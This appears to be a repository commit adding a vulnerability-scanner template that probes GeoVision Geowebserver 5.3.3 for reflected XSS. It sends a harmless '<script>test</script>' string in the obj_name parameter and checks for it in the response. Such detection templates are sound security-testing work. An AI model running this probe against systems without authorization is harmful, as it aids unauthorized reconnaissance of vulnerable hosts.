Create geovision-geowebserver-xss.yaml
parent
5b17aea895
commit
0c24cc2f74
|
@ -0,0 +1,28 @@
|
|||
id: geowebserver-xss
|
||||
|
||||
info:
|
||||
name: GeoVision Geowebserver 5.3.3 - XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/exploits/50211
|
||||
tags: geowebserver,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /Visitor/bin/WebStrings.srf?file=&obj_name=<script>test</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
|
||||
Accept: */*
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "<script>test</script>"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue